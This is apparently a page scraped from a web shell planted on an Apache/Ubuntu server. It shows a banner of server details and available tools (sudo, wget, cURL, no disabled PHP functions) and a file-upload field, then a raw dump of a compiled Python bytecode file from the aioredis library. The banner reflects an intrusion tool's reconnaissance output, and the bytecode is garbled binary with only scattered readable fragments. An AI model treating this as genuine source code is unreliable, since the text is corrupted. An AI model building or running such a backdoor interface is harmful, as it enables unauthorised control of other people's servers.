| Server IP : 127.0.1.1 / Your IP : 216.73.216.17 Web Server : Apache/2.4.58 (Ubuntu) System : Linux dalsi.io 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.3.6 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /lib/python3/dist-packages/aioredis/__pycache__/ |
Upload File : |
�
���]� � � � d dl mZmZ ddlmZmZmZmZ ddgZ G d� d� Z G d� d� Z
dd lZej Zy # e
$ r e ZY y w xY w)
� )�
ProtocolError�
ReplyError� )�Optional� Generator�Callable�Iterator�Reader�PyReaderc �l � e Zd ZdZeedfdededee fd�Z dde
de
fd �Zd
� Zdee
ddfd
�Z
de
fd�Zy)r znPure-Python Redis protocol parser that follows hiredis.Reader
interface (except setmaxbuf/getmaxbuf).
N�
protocolError�
replyError�encodingc � � t |� st d� �t |� st d� �t |||� | _ y )NzExpected a callable)�callable� TypeError�Parser�_parser��selfr
r r s �1/usr/lib/python3/dist-packages/aioredis/parser.py�__init__zPyReader.__init__
s<